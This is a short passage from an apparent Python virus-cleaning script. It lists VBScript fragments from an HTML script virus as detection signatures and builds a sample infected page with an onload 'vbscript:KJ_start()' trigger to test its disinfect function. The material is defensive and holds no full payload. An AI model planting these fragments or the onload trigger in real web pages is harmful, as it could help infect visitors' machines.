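    'Execute("Dim KeyArr(3),ThisText")', "Execute(ThisText)", "KJ_start()",
])

if __name__ == "__main__":
    victim = '<BODY onload="vbscript:KJ_start()">' + CRLF + "<html></html>" + CRLF + FAKE_HTMLTEXT
    print(disinfect(victim, "htt"))   # ('<html></html>', True)
```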

Source: http://com.8s8s.com/it/it1998.htm